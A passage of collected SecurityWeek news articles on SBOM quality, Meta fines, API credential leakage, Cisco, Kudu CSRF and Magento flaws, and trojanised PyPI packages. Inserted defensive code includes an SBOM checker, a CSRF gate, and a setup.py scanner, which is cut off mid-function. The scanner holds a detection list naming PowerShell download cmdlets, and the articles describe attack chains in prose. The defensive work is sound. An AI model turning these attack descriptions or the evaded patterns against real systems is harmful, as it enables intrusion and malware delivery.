Chainguard Trains Spotlight on SBOM Quality Problem

Software engineers tracking the quality of software bill of materials have stumbled on a startling discovery: Barely 1% of all SBOMs being generated today meets the “minimum elements” defined by the U.S. government.

According to new data from software supply chain security startup Chainguard, SBOMs being generated by existing tools fail to meet the minimum data fields needed inside an SBOM to enable the management of software vulnerabilities, licenses, and inventory tracking.

“Only one percent of SBOMs were entirely conformant with the minimum elements. The minimum elements appear to be a high bar for SBOMs. Further research will need to address whether the standard is too high, whether SBOM generation tools must evolve, or whether the underlying software artifacts lack necessary package metadata,” Chainguard security data scientist John Speed Meyers explained.

Chainguard’s researchers collected about 3,000 SBOMs for analysis using four SBOM creation tools from a list of popular Docker Hub containers and used an NTIA conformance checker tool to measure SBOM conformance with minimum elements.

The team said the minimum element data fields include information about each software component (supplier, name, version, unique ID, relationships) and also metadata about the SBOM itself, including the author and the time of creation.

After parsing the data, the Chainguard team found the majority of SBOMs lacked specified suppliers for their components while about 1,000 SBOMs failed to specify a name or version for all components.
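The checks Chainguard describes can be reproduced with a small conformance routine. This is an added example, not Chainguard's code or the NTIA conformance checker the article mentions; it reads a simplified SPDX 2.x style JSON document (field names follow the SPDX JSON schema) and reports, per component and per document, which of the seven minimum elements are missing. The sample document is constructed inline.

```python
"""Minimum-elements conformance check over SPDX-2.x-style JSON SBOMs.

Added example, not Chainguard's code or the NTIA conformance checker the
article mentions. SAMPLE_SBOM is a constructed document, not real data.
"""
from dataclasses import dataclass, field

# Identifier schemes that satisfy the "other unique identifiers" element.
UNIQUE_ID_TYPES = {"purl", "cpe22Type", "cpe23Type", "swid"}


@dataclass
class Report:
    missing_document: list = field(default_factory=list)    # e.g. ["author"]
    missing_components: dict = field(default_factory=dict)  # SPDXID -> fields

    @property
    def conformant(self) -> bool:
        return not self.missing_document and not self.missing_components


def _has_unique_id(pkg: dict) -> bool:
    return any(ref.get("referenceType") in UNIQUE_ID_TYPES
               for ref in pkg.get("externalRefs", []))


def check_minimum_elements(sbom: dict) -> Report:
    """Check the minimum elements the article lists: per component supplier,
    name, version, unique ID and relationship; per document author and time."""
    report = Report()
    info = sbom.get("creationInfo", {})
    if not info.get("creators"):
        report.missing_document.append("author")
    if not info.get("created"):
        report.missing_document.append("timestamp")
    # A component has a dependency relationship if it appears on either side
    # of any relationship record in the document.
    related = set()
    for rel in sbom.get("relationships", []):
        related.add(rel.get("spdxElementId"))
        related.add(rel.get("relatedSpdxElement"))
    for pkg in sbom.get("packages", []):
        missing = []
        if pkg.get("supplier") in (None, "", "NOASSERTION"):
            missing.append("supplier")
        if not pkg.get("name"):
            missing.append("name")
        if not pkg.get("versionInfo"):
            missing.append("version")
        if not _has_unique_id(pkg):
            missing.append("unique_id")
        if pkg.get("SPDXID") not in related:
            missing.append("relationship")
        if missing:
            report.missing_components[pkg.get("SPDXID", "<no id>")] = missing
    return report


def conformance_rate(sboms) -> float:
    """Fraction of documents that are fully conformant (the article's 1% figure)."""
    sboms = list(sboms)
    if not sboms:
        return 0.0
    return sum(check_minimum_elements(s).conformant for s in sboms) / len(sboms)


# Constructed document: one complete package and one typical of the article's
# findings (no supplier, no version, and no relationship record).
SAMPLE_SBOM = {
    "spdxVersion": "SPDX-2.3",
    "creationInfo": {"created": "2023-01-19T00:00:00Z",
                     "creators": ["Tool: example-generator-0.1"]},
    "packages": [
        {"SPDXID": "SPDXRef-app", "name": "example-app", "versionInfo": "1.4.2",
         "supplier": "Organization: Example Corp",
         "externalRefs": [{"referenceCategory": "PACKAGE-MANAGER",
                           "referenceType": "purl",
                           "referenceLocator": "pkg:deb/debian/example-app@1.4.2"}]},
        {"SPDXID": "SPDXRef-libfoo", "name": "libfoo",
         "externalRefs": [{"referenceCategory": "PACKAGE-MANAGER",
                           "referenceType": "purl",
                           "referenceLocator": "pkg:deb/debian/libfoo"}]},
    ],
    "relationships": [
        {"spdxElementId": "SPDXRef-DOCUMENT", "relationshipType": "DESCRIBES",
         "relatedSpdxElement": "SPDXRef-app"},
    ],
}

if __name__ == "__main__":
    r = check_minimum_elements(SAMPLE_SBOM)
    print("conformant:", r.conformant, "| missing:", r.missing_components)
```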

The latest Chainguard discovery is sure to add fuel to an ongoing debate over the value and quality of SBOMs to help mitigate supply chain attacks. 

A high-powered lobbying outfit representing some of the biggest names in technology has already signaled strong objection to the government’s SBOM mandate, arguing that “it is premature and of limited utility” because SBOMs are not currently scalable or consumable. 

The ITI lobbying outfit, which counts Amazon, Microsoft, Apple, Intel, AMD, Lenovo, IBM, Cisco, Samsung, TSMC, Qualcomm, Zoom and Palo Alto Networks among its prominent members, described the current SBOM process as immature. 

“At this time, it is premature and of limited utility for software producers to provide an SBOM. We ask that OMB discourage agencies from requiring artifacts until there is a greater understanding of how they ought to be provided and until agencies are ready to consume the artifacts that they request,” the group said.

In its research, Chainguard called attention to the ITI objections, cautioning that its findings are not meant to be viewed as evidence for what it called a cynical argument that SBOMs are “immature” and not yet “consumable.” 

“This analysis suggests that standard SBOMs already provide a great deal of information but not enough to satisfy the minimum elements. Additionally, this research implies that the push to make SBOMs “everywhere” should be accompanied by an effort to measure and improve the quality of SBOMs,” the company said.

“A tool-by-tool analysis suggests that none of the tools appear to consistently create minimum elements-compliant SBOMs,” Chainguard added.

Still, the company is advising caution against dismissing the usefulness of SBOMs. “The results suggest lots of variability: some SBOMs are high-quality, some are low-quality,” it said.

The SBOM mandate was included in a cybersecurity executive order issued last May, sending security leaders scrambling to understand the ramifications and prepare for downstream side-effects.

Related: Big Tech Vendors Object to US Gov SBOM Mandate

Related: Microsoft Releases Open Source Toolkit for Generating SBOMs 

Related: Cybersecurity Leaders Scramble to Decipher SBOM Mandate

Ryan Naraine is Editor-at-Large at SecurityWeek and host of the popular Security Conversations podcast series.
Ryan is a veteran cybersecurity strategist who has built security engagement programs at major global brands, including Intel Corp., Bishop Fox and GReAT. He is a co-founder of Threatpost and the global SAS conference series. Ryan’s past career as a security journalist included bylines at major technology publications including Ziff Davis eWEEK, CBS Interactive’s ZDNet, PCMag and PC World.
Ryan is a director of the Security Tinkerers non-profit, an advisor to early-stage entrepreneurs, and a regular speaker at security conferences around the world.
Follow Ryan on Twitter @ryanaraine.


https://www.securityweek.com/chainguard-trains-spotlight-sbom-quality-problem




Meta Slapped With 5.5 Million Euro Fine for EU Data Breach

Social media giant Meta has been fined an additional 5.5 million euros ($5.9 million) for violating EU data protection regulations with its instant messaging platform WhatsApp, Ireland’s regulator announced Thursday.

The penalty follows a far larger 390-million-euro fine for Meta’s Instagram and Facebook platforms two weeks ago after they were found to have flouted the same EU rules.

In its new decision, the Irish Data Protection Commission (DPC) found the group acted “in breach of its obligations in relation to transparency,” the watchdog said in a statement.

In addition, Meta relied on an incorrect legal basis “for its processing of personal data for the purposes of service improvement and security,” the DPC added, giving the group six months to comply.

The fine was imposed by the Irish regulator because Meta — along with other US tech firms — has its European headquarters in Dublin.

In response on Thursday, Meta said it was opposed to the DPC decision and would look to overturn it.

“We strongly believe that the way the service operates is both technically and legally compliant,” a WhatsApp spokesperson said.

“We disagree with the decision and we intend to appeal.”

The breaches are similar to those explained in the regulator’s action against Meta earlier in January.

But the earlier decision also accused the Meta platforms of breaking rules over the processing of personal data for the purpose of targeted advertising.

In that instance the company, co-founded by social media magnate Mark Zuckerberg, was given only three months to respond to comply with the Irish regulator.

Meta announced its intention to appeal the 4 January decision, adding the regulatory ruling did not prevent targeted or personalised advertising.

The DPC said its more recent fine was considerably less because of a 225 million euro fine imposed on WhatsApp “for breaches of this and other transparency obligations over the same period of time”.

Thursday’s Whatsapp fine was also far lower because it did not relate to targeted advertising.

The Irish regulator had fined Meta 405 million euros in September for failures in handling the data of minors, and 265 million euros in November for not sufficiently protecting users’ data.

This latest round of fines follows the adoption of three binding decisions by the European Data Protection Board (EDPB), the EU’s data protection regulator, in early December.

The Vienna-based privacy group NOYB, which brought the three complaints against Meta in 2018, had accused the social media behemoth of reinterpreting consent as a civil law contract, which stopped users from refusing targeted advertising.

In reaction to Thursday’s news, NOYB criticised the “tiny” size of the latest fine — and slammed the DPC for ignoring how WhatsApp shares data within the group for advertising purposes.

“We are astonished how the DPC simply ignores the core of the case after a 4.5-year procedure,” said NOYB founder Max Schrems.

In October 2021, the Irish authority had proposed a draft decision that validated the legal basis used by the group and suggested a fine of up to 36 million euros for Facebook and up to 23 million euros for Instagram, over their lack of transparency.

France’s CNIL regulator and other European bodies disagreed with the draft sanction, which they considered to be far too low.

They asked the EDPB to judge the dispute, and the EU data regulator decided in their favour.

The EDPB has also asked the Irish regulator to investigate Meta’s use of personal data.

However, in its statement the DPC pushed back, saying the EU body does not have the power to “direct an authority to engage in open-ended and speculative investigation”.

The regulator said it will seek to annul the EDPB’s request before the European Union’s Court of Justice.

© AFP 2022


https://www.securityweek.com/meta-slapped-55-million-euro-fine-eu-data-breach




B2B Payment Security Firm NsKnox Raises $17 Million

B2B payment security provider NsKnox this week announced that it has raised $17 million in a new funding round that brings the total raised by the company to $35.6 million.

The new investment round was led by new investors Link Ventures and Harel Insurance and Finance, with participation from previous investors Microsoft’s M12 and Viola Ventures. NsKnox founder and CEO Alon Cohen also participated.

Founded in 2016, the Israeli company helps enterprises prevent fraud and protect B2B transactions by securing outbound and inbound payments using proprietary technologies, including Cooperative Cyber Security (CCS) and Bank Account Certificate.

NsKnox says its solutions can identify and mitigate finance and ops infrastructure attacks, business email compromise (BEC), insider fraud, social engineering, and other types of fraud attacks.

The fintech security company also provides organizations with account validation through its PaymentKnox end-to-end payment security platform, to verify the identity of senders and receivers and prevent transaction manipulation.

NsKnox says it will use the new funds to expand its product portfolio to corporations and banks, and to scale its go-to-market infrastructure.

Related: SASE Company Netskope Raises $401 Million

Related: Cyber Insurance Analytics Firm CyberCube Raises $50 Million

Related: API Security Firm FireTail Raises $5 Million

Related: Snyk Raises $196.5 Million at $7.4 Billion Valuation

Ionut Arghire is an international correspondent for SecurityWeek.


https://www.securityweek.com/b2b-payment-security-firm-nsknox-raises-17-million




Credential Leakage Fueling Rise in API Breaches

There is a problem with API security – it isn’t working very well, and it’s largely down to credential leakage. Most security professionals are confident in their own API credential management; but at the same time, most of the same professionals admit to having experienced a breach effected through compromised API credentials.

In a survey of more than 400 US-based professionals (more than 90% of whom were developers or security people), 53% claimed to have suffered an API breach, while 77% claimed their company was very or extremely effective in managing their tokens. Only 3% believed they are not effective in protecting the credentials – and yet API breaches continue to rise.

The cause of this apparent contradiction is probably threefold: a lack of visibility into existing APIs, the sheer volume of APIs that are in use, and the amount of time already being spent on managing the credentials for those APIs. The survey conducted by Corsha discovered that 64% of companies are managing more than 250 API credentials across their network (with 3% managing more than 1,000).

This volume, and the company effort, is reflected in the amount of time spent on protecting them. Eighty-six percent of the respondents spend up to 15 hours every week provisioning, managing, and dealing with API secrets. That is time taken away from app development – making API secrets a costly and expensive exercise that still doesn’t work. Corsha costed this on an average developer’s salary of about $120,000 per year: “That means each respondent could be spending up to $44,460 per year on secrets management.”

There would appear to be no way of preventing API credential leakage. Corsha sees them being leaked from code repositories, versioning control, CI build systems, test artifacts and cloud environments. This problem is only going to worsen. Cisco predicts there will be more than 500 million new digital applications in 2023. “More applications means that the army of machines requiring API access will only catapult,” notes the report.

Credential rotation is one of the best manual practices to keep API secrets secret. Today, 27% of the survey respondents reported (PDF) that they rotate their API secrets only once per quarter, and sometimes only once per year. The strain on existing resources in a difficult economy combined with a growing API usage will make credential leakage more widespread, and credential rotation more problematic.

“The heavy administrative workload and exceedingly manual processes for maintaining good security hygiene around secrets management create significant opportunities for error or oversight,” notes Scott Hopkins, COO at Corsha.

“Security and engineering teams are forced to divert their attention away from forward-facing engineering to focus on secrets management, yet their organizations remain vulnerable to attackers both through lateral attacks and leaked or compromised API secrets to gain illegitimate access to sensitive data,” adds Jared Elder, Chief Growth Officer at Corsha. “Data is everything and the potential risk from data breaches associated with leaked API secrets is clearly high and growing. Yet with an explosion of credentials to provision, rotate, and manage, the good guys find themselves constantly behind the eight ball.”

Corsha’s own solution to the problem is to add MFA to credential usage. This has several advantages. Firstly, since most of the APIs are internal on company networks, MFA from machine to machines is a form of microsegmentation that conforms to the principles of a zero trust architecture. This limits lateral movement by adversaries already in the network.

Secondly, one-time MFA from machine to machine is immune to one of the most successful MFA attacks used against humans – MFA fatigue attacks.

Thirdly, and perhaps most attractively, it removes the problem of credential rotation. Even if credentials are lost, stolen, or leaked, they cannot be used by adversaries who are unable to get through the MFA.

“That’s the problem we’re solving,” Anusha Iyer, co-founder and CEO at Corsha, told SecurityWeek. “If you have MFA in place, you don’t have to worry about the frequent rotation, and the same extensive hygiene of these static credentials.” 

All the customer needs to do is place the Corsha proxy at a point where it can monitor the traffic. “We will see the traffic that is coming in with good credentials and good MFA tokens and allow it; and we’ll see the traffic that’s coming in with no MFA or bad MFA credentials and block it,” she added.

Bad credentials probably mean bad guys on the network – so Corsha’s solution increases both visibility and prevention. The core of the Corsha platform is a distributed ledger system. Corsha uses this as an out-of-band element in the generation and use of machine-to-machine MFA. “The process is analogous to Google Authenticator,” explained Iyer. “In one direction you’re keeping in sync with a seed on Google servers, while in the other direction you’re using that to check MFA credentials.”

Corsha was founded in 2018 by Anusha Iyer, and Chris Simkins. It is headquartered in Washington, DC. It raised $12 million in a Series A funding round led by Ten Eleven Ventures and Razor’s Edge Ventures, with participation from 1843 Capital in April 2022.

Other providers in the API security space include Cequence, 42Crunch, Traceable AI, Ghost Security, Pangea Cyber, Wib, FireTail and Salt Security.

Related: U.S. Postal Service API Flaw Exposes Data of 60 Million Customers

Related: Leaked Algolia API Keys Exposed Data of Millions of Users

Related: Leaked GitHub API Token Exposed Homebrew Software Repositories 

Related: The Next Big Cyberattack Vector: APIs

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.


https://www.securityweek.com/credential-leakage-fueling-rise-api-breaches




Cisco Patches High-Severity SQL Injection Vulnerability in Unified CM

Cisco on Wednesday announced patches for a high-severity SQL injection vulnerability in Unified Communications Manager (CM) and Unified Communications Manager Session Management Edition (CM SME).

Designed as enterprise call and session management platforms, Cisco Unified CM and Unified CM SME ensure the interoperability of applications such as Webex, Jabber, and more, while also maintaining availability and security.

Tracked as CVE-2023-20010 (CVSS score of 8.1), the vulnerability exists because user input is improperly validated in the web-based management interface of the platforms. The bug allows a remote, authenticated attacker to launch an SQL injection attack on a vulnerable system.

“An attacker could exploit this vulnerability by authenticating to the application as a low-privileged user and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to read or modify any data on the underlying database or elevate their privileges,” Cisco notes in an advisory.

The security defect impacts Cisco Unified CM and Unified CM SME versions 11.5(1), 12.5(1), and 14, and was addressed in version 12.5(1)SU7 of the applications. A patch will also be included in version 14SU3, which is scheduled for March 2023.

On Wednesday, the tech giant also informed customers of a medium-severity URL filtering bypass vulnerability in AsyncOS software for Email Security Appliance (ESA). A remote, unauthenticated attacker could exploit the bug using crafted URLs.

This week, Cisco also announced patches for three medium severity bugs in Expressway Series and TelePresence Video Communication Server (VCS).

Impacting the API and web-based management interfaces of these products, the flaws could be exploited by an authenticated, remote attacker to write files or access sensitive data on a vulnerable device. All Expressway Series and TelePresence VCS releases prior to 14.0.7 are impacted.

Cisco says it is not aware of any of these vulnerabilities being exploited in the wild. Further information on the flaws can be found on Cisco’s product security page.

Related: Cisco Warns of Critical Vulnerability in EoL Small Business Routers

Related: Cisco Patches High-Severity Bugs in Email, Identity, Web Security Products

Related: Cisco Secure Email Gateway Filters Bypassed Due to Malware Scanner Issue

Ionut Arghire is an international correspondent for SecurityWeek.


https://www.securityweek.com/cisco-patches-high-severity-sql-injection-vulnerability-unified-cm




International Arrests Over ‘Criminal’ Crypto Exchange

The owner of China-based cryptocurrency exchange Bitzlato was arrested in Miami on Wednesday, along with five associates in Europe, during an international operation against “darknet” markets.

Anatoly Legkodymov, 40, a Russian living in Shenzhen, China, appeared in handcuffs and leg shackles in a Miami courtroom on money laundering charges, and was denied bail by a judge who deemed him a flight risk.

He was detained for his role in allegedly transmitting a total of $700 million in illicit funds, the US Department of Justice charged, with officials saying that criminals used the exchange as a haven for narcotics trading and selling stolen financial information.

Five other men, mainly of Russian and Ukrainian nationalities, were arrested in Spain, Portugal and Cyprus, as part of a complex police swoop led by French authorities, officials in Paris said.

According to US court documents, Legkodymov is the founder and majority shareholder of Hong Kong-registered Bitzlato, which marketed itself as requiring minimal identification from users.

Bitzlato’s largest partner for transactions was Hydra, an anonymous, illicit online marketplace on the “darknet” that was shut down by US and German authorities last year.

The secret “darknet” includes websites that can be accessed only with specific software or authorizations, ensuring anonymity for users.

As the arrests were announced, authorities dismantled Bitzlato’s digital infrastructure, including its servers in France, and seized cryptocurrency worth $17 million.

Paris prosecutor Laure Beccuau said Bitzlato enabled cryptocurrencies including bitcoin and ethereum to be converted into Russian rubles.

‘Cryptocrime ecosystem’

US Deputy Attorney General Lisa Monaco welcomed “a significant blow to the cryptocrime ecosystem.”

“Overnight, the Department worked with key partners here and abroad to disrupt Bitzlato, the China-based money laundering engine that fueled a high-tech axis of cryptocrime, and to arrest its founder,” she said.

Monaco said that “today’s actions send the clear message: whether you break our laws from China or Europe — or abuse our financial system from a tropical island — you can expect to answer for your crimes.”

When it was closed in April 2022, the Hydra marketplace had around 17 million customer accounts and more than 19,000 vendor accounts, according to German federal police.

Such networks have faced increased pressure from international law enforcement after a boom in usage during the coronavirus pandemic.

“As alleged, Bitzlato sold itself to criminals as a no-questions-asked cryptocurrency exchange, and reaped hundreds of millions of dollars’ worth of deposits as a result,” said Breon Peace, Attorney for the Eastern District of New York.

“The defendant is now paying the price for the malign role that his company played in the cryptocurrency ecosystem.

“Bitzlato allegedly became a haven for criminal proceeds and funds intended for use in criminal activity.”

In May 2019, Legkodymov allegedly told a colleague on Bitzlato’s internal chat system that users were “known to be crooks” deploying others’ identity documents to register accounts.

In the Miami courtroom, Federal Judge Jacqueline Becerra told Legkodymov, dressed in a gray polo shirt and blue shorts, that he faces a possible five-year prison term. Legkodymov will return to court Friday for a hearing on his transfer to New York, where the charges were brought.

US officials are cracking down on the cryptocurrency sector after the uproar caused by the recent bankruptcy of FTX and Alameda Research.

FTX, once the world’s highest profile crypto exchange, collapsed spectacularly in November leaving nine million customers in the lurch and seeing cofounder Sam Bankman-Fried indicted for fraud by US prosecutors.

Related: Canadian Teen Arrested Over Theft of $36 Million in Cryptocurrency

Related: Justice Dept. Announces $3.6B Crypto Seizure, 2 Arrests

© AFP 2022


https://www.securityweek.com/international-arrests-over-criminal-crypto-exchange




CSRF Vulnerability in Kudu SCM Allowed Code Execution in Azure Services

A cross-site request forgery (CSRF) vulnerability impacting the source control management (SCM) service Kudu could be exploited to achieve remote code execution (RCE) in multiple Azure services, cloud infrastructure security firm Ermetic has discovered.

A web-based Git repository manager, Kudu is the engine behind several Azure App Service features, supporting the deployment and management of code in Azure. The service is used by Functions, App Service, Logic Apps, and other Azure services.

Administrators can manage Azure applications from the SCM panel, which uses Kudu and which requires Azure Active Directory (AAD) authentication. The SCM panel is deployed by default by the App Service, Function Apps, and Logic Apps Azure services.

“If the user has authenticated to their Microsoft account through the browser, they can simply navigate to the SCM panel and log in. Otherwise, they need to log in manually with their Microsoft authorized credentials,” Ermetic notes.

The CSRF vulnerability in Kudu could be exploited to deploy a malicious ZIP file to the victim’s Azure application, which could result in code execution and application takeover. Ermetic calls the attack EmojiDeploy.

Successful exploitation of the security defect could allow an attacker to run code as the www user, steal or tamper with sensitive data, launch phishing campaigns, and even move laterally to other Azure services.

“The vulnerability enables RCE and full takeover of the target app. The impact of the vulnerability on the organization as a whole depends on the permissions of the applications managed identity. Effectively applying the principle of least privilege can significantly limit the blast radius,” Ermetic notes.

According to Ermetic, an attacker targeting the vulnerability would need to exploit a same-site misconfiguration to bypass an origin check, and then exploit a vulnerable endpoint, which would eventually lead to RCE.

Specifically, Ermetic discovered that the Same-Site attribute for the SCM panel’s cookie was set to “None”, meaning that no protection was being offered against cross-origin attacks, and that the SCM server would accept requests containing special characters, leading to cross-origin protections bypass.

“This finding allows an attacker to create a wildcard DNS record for his own domain and send cross-origin requests with special characters that eventually will be accepted by the server origin check,” Ermetic explains.

The researchers also discovered that, when processing requests to the ZIP ‘deploy to application’ feature available through the SCM, the server does not validate or require the headers sent by the client, which would bypass existing CSRF mitigations.

“After some investigation, the SCM Server in this particular zipdeploy endpoint accepts text/plain Mime-types. We can encode our zip payload and use text/plain for CSRF,” Ermetic notes.

The EmojiDeploy attack can be performed via a browser, but exploitation of the vulnerability requires the attacker to have SCM or Microsoft account cookies in their browser.

The vulnerability was reported to Microsoft in October 2022 and the tech giant addressed it in December through stronger origin checks on the server and by changing the same-site cookie value to ‘Lax’. Microsoft awarded a $30,000 bug bounty for the issue.
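The three server-side weaknesses the article walks through (a permissive origin check, a deploy endpoint that accepted text/plain without requiring any header, and a session cookie set to SameSite=None) map to three defensive checks. The code below is an added example and is not Kudu's, Microsoft's or Ermetic's code; the host names, the allow-list and the custom header name are hypothetical, and the request and Set-Cookie samples in the test are constructed.

```python
"""CSRF gate for a cookie-authenticated, state-changing deploy endpoint.

Added example, not Kudu's, Microsoft's or Ermetic's code. Host names, the
allow-list and the custom header name below are hypothetical.
"""
import re
from urllib.parse import urlsplit

# Exact origins that may drive the deploy endpoint (hypothetical host).
ALLOWED_ORIGINS = {"https://myapp.scm.example.net"}
# Body types a cross-site form or "simple" fetch cannot send without a CORS
# preflight; text/plain is deliberately absent from this set.
DEPLOY_CONTENT_TYPES = {"application/zip", "application/octet-stream"}
# RFC 1123 host syntax: no percent escapes, whitespace or other special characters.
_HOST_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")


def canonical_origin(value):
    """Return 'https://host[:port]' for a well-formed Origin value, else None.

    Canonicalising first, then comparing for exact equality, is what stops
    values with stray characters or extra labels from matching a trusted host.
    """
    if not value or any(ch.isspace() for ch in value):
        return None
    parts = urlsplit(value)
    if parts.scheme != "https" or parts.path or parts.query or parts.fragment:
        return None
    if parts.username is not None or parts.password is not None:
        return None
    host = parts.hostname or ""
    if not _HOST_RE.match(host):
        return None
    try:
        port = parts.port
    except ValueError:  # non-numeric or out-of-range port
        return None
    return f"https://{host}" + (f":{port}" if port not in (None, 443) else "")


def origin_allowed(value) -> bool:
    return canonical_origin(value) in ALLOWED_ORIGINS


def audit_set_cookie(header: str):
    """Flag weak attributes on a Set-Cookie line; returns sorted findings."""
    attrs = {}
    for part in header.split(";")[1:]:
        name, _, val = part.strip().partition("=")
        attrs[name.lower()] = val.lower()
    findings = []
    if attrs.get("samesite", "") not in ("lax", "strict"):
        findings.append("samesite-not-lax-or-strict")  # None, as in the article
    if "secure" not in attrs:
        findings.append("missing-secure")
    if "httponly" not in attrs:
        findings.append("missing-httponly")
    return sorted(findings)


def deploy_request_allowed(headers: dict):
    """Decide whether a deploy request passes the CSRF gate.

    Returns (allowed, reason). Header names are matched case-insensitively.
    """
    h = {k.lower(): v for k, v in headers.items()}
    if not origin_allowed(h.get("origin")):
        return False, "origin rejected"
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in DEPLOY_CONTENT_TYPES:
        return False, "content-type not acceptable for deploy"
    # A custom header (hypothetical name) forces a preflight for cross-origin callers.
    if h.get("x-requested-with", "").lower() != "xmlhttprequest":
        return False, "missing custom header"
    return True, "ok"
```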

Related: Azure Services SSRF Vulnerabilities Exposed Internal Endpoints, Sensitive Data

Related: Microsoft Patches Azure Cross-Tenant Data Access Flaw

Related: Microsoft Patches Vulnerability Allowing Full Access to Azure Service Fabric Clusters

Ionut Arghire is an international correspondent for SecurityWeek.


https://www.securityweek.com/csrf-vulnerability-kudu-scm-allowed-code-execution-azure-services




Sophos Joins List of Cybersecurity Companies Cutting Staff

Sophos has confirmed reports that it’s laying off employees. The company joins several other major cybersecurity companies that have announced cutting staff over the past year.

The first reports of layoffs at Sophos came from India. The company confirmed to TechCrunch that 10% of its global employee base is impacted. While an exact number has not been shared, the news website learned that roughly 450 people — potentially from all roles — have lost their job.

Sophos, which private equity firm Thoma Bravo acquired in 2020 for $3.9 billion, blamed the layoffs on the global economic slowdown. The company says it wants to focus more on cybersecurity services, including managed detection and response.

“Sophos is taking these steps for two main reasons: first, to ensure that we achieve the optimal balance of growth and profitability to support Sophos’ long-term success, which is particularly important in the midst of a challenging and uncertain macro environment; and second, to allocate our investments across the company to support our strategic imperative to be a market leader in delivering cybersecurity as a service,” a Sophos spokesperson told TechCrunch.

Several major cybersecurity companies announced layoffs over the past year, including Lacework, OneTrust, and Cybereason.

Microsoft announced this week plans to eliminate 10,000 jobs, but it’s unclear if its security business units are impacted.

While major cybersecurity companies are announcing layoffs, many of those who have been terminated will likely not have any difficulties securing a job at a different company.

According to a recent study from nonprofit (ISC)², the global cybersecurity workforce is at an all-time high, with an estimated 4.7 million professionals.

However, (ISC)² estimates that an additional 3.4 million cybersecurity workers are needed, with 70% of the 11,000 professionals who took part in a survey conducted by the nonprofit saying that their organization does not have enough cybersecurity employees.

Related: How a VC Chooses Which Cybersecurity Startups to Fund in Challenging Times

Related: Predictions 2023: Big Tech’s Coming Security Shopping Spree

Related: Cybersecurity Workforce Study Needs to be Taken with a Pinch of Salt

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.


https://www.securityweek.com/sophos-joins-list-cybersecurity-companies-cutting-staff




Vendors Actively Bypass Security Patch for Year-Old Magento Vulnerability

Vendors and agencies are actively bypassing the security patch that Adobe released in February 2022 to address CVE-2022-24086, a critical mail template vulnerability in Adobe Commerce and Magento stores, ecommerce security firm Sansec warns.

The CVE-2022-24086 bug (CVSS score of 9.8) is described as an improper input validation bug in the checkout process. It could be exploited to achieve arbitrary code execution, with in-the-wild exploitation observed roughly one week after patches were made available for it.

The initial fixes were found to be easily bypassed, and Adobe issued a second round of patches and a new CVE identifier (CVE-2022-24087) for the bug only days later. A proof-of-concept (PoC) exploit targeting the flaw was released around the same time.

To address the vulnerability, Adobe removed ‘smart’ mail templates and replaced the old mail template variable resolver with a new one, to prevent potential injection attacks.

However, the move caught many vendors off guard, and some of them “had to revert to the original functionality.” In doing so, they unknowingly exposed themselves to the critical vulnerability, despite having applied the latest security patch, Sansec explained.

The security firm has observed some vendors attempting to reintroduce the functionality of the deprecated resolver into production Magento stores, either by overriding the functionality of the new resolver, or by copying code from older versions of Magento and using it as a preference.

“We have observed this risky behavior at multiple agencies as well as extension vendors, likely to avoid the need to update their email templates to be compatible with the new [resolver],” Sansec added.

The company said some vendors attempted to mitigate the risk by adding basic filtering of unsafe user input to their ordering systems, but that does not prevent exploitation, given that the vulnerability can be triggered from other subsystems as well, if they touch email.

Related: Magento Vulnerability Increasingly Exploited to Hack Online Stores

Related: Malware Infects Magento-Powered Stores via FishPig Distribution Server

Related: CISA Urges Orgs to Patch Recent Chrome, Magento Zero-Days

Ionut Arghire is an international correspondent for SecurityWeek.


https://www.securityweek.com/vendors-actively-bypass-security-patch-year-old-magento-vulnerability




PyPI Users Targeted With ‘Wacatac’ Trojan in New Supply Chain Attack

Fortinet warns of three new malicious PyPI packages containing code designed to fetch the Wacatac trojan and information stealer as a next stage payload.

The three Python packages, ‘colorslib’, ‘httpslib’ and ‘libhttps’ were uploaded to PyPI (Python Package Index) on January 7 and January 12.

All three packages were published by the same author from a user account named ‘Lolip0p’, which joined the repository shortly before the packages were published.

The Python packages feature legitimate-looking descriptions, meant to trick users into believing they are clean. However, Fortinet discovered that all versions of these packages are, in fact, malicious.

Each package, the cybersecurity firm says, contains the same setup.py script, which attempts to run a PowerShell script to download an executable binary from an external link.

The download URL has not been flagged as malicious by any of the antivirus products on VirusTotal, but the downloaded file is detected as malicious by a few of them.

Named ‘Oxyz.exe’, the executable has been designed to download another binary, called ‘update.exe’, which is executed from the victim’s temp folder. The binary drops additional files in the same folder.

Both the binary and one of the executables it fetches (SearchProtocolHost.exe) are flagged by several antivirus tools as ‘Wacatac’, a trojan and information stealer that targets login credentials, banking information, and other sensitive information.
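Because the malicious behaviour here lives in setup.py and runs at install time, a package can be triaged before `pip install` ever executes it. The following static check is an added example (not Fortinet's tooling): it parses setup.py with Python's `ast` module and reports any `os`/`subprocess` call whose string arguments mention PowerShell, a download cmdlet, a URL or an `.exe`. The `SAMPLE_SETUP_PY` text is constructed to mirror the shape the article describes and is not the real package's code; the URL in it is a placeholder.

```python
"""Static triage of a package's setup.py for install-time command execution.

Added example, not Fortinet's tooling. SAMPLE_SETUP_PY is constructed to
mirror the behaviour the article describes; it is not the real package code.
"""
import ast

# Calls that hand a command line to the OS during `pip install`.
EXEC_CALLS = {
    ("os", "system"), ("os", "popen"), ("subprocess", "run"),
    ("subprocess", "Popen"), ("subprocess", "call"),
    ("subprocess", "check_call"), ("subprocess", "check_output"),
}
# Substrings worth flagging when they appear in the arguments of such a call.
SUSPICIOUS_TOKENS = ("powershell", "invoke-webrequest", "downloadfile",
                     "http://", "https://", ".exe")


def _import_aliases(tree):
    """Map local names to (module, attr) for os/subprocess imports."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.name in ("os", "subprocess"):
                    aliases[a.asname or a.name] = (a.name, None)
        elif isinstance(node, ast.ImportFrom) and node.module in ("os", "subprocess"):
            for a in node.names:
                aliases[a.asname or a.name] = (node.module, a.name)
    return aliases


def _resolve(func, aliases):
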